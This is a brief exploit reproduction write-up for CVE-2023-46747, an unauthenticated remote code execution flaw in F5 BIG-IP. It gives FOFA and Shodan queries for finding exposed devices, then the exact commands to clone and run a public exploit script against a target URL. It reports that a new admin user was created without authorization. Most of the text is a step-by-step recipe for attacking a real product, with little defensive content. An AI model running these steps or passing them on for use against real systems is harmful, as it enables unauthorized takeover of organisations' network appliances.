Vulnerability details
- fofa:
title="BIG-IP®- Redirect"
; shodan:title:"BIG-IP®- Redirect"
- Affected versions: https://my.f5.com/manage/s/article/K000137353
Vulnerability recurrence
-
At this time, the user here is only
admin
:
-
Execute the script:
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
Successfully executed command:
- A new user was successfully created without authorization here:
Reference
https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747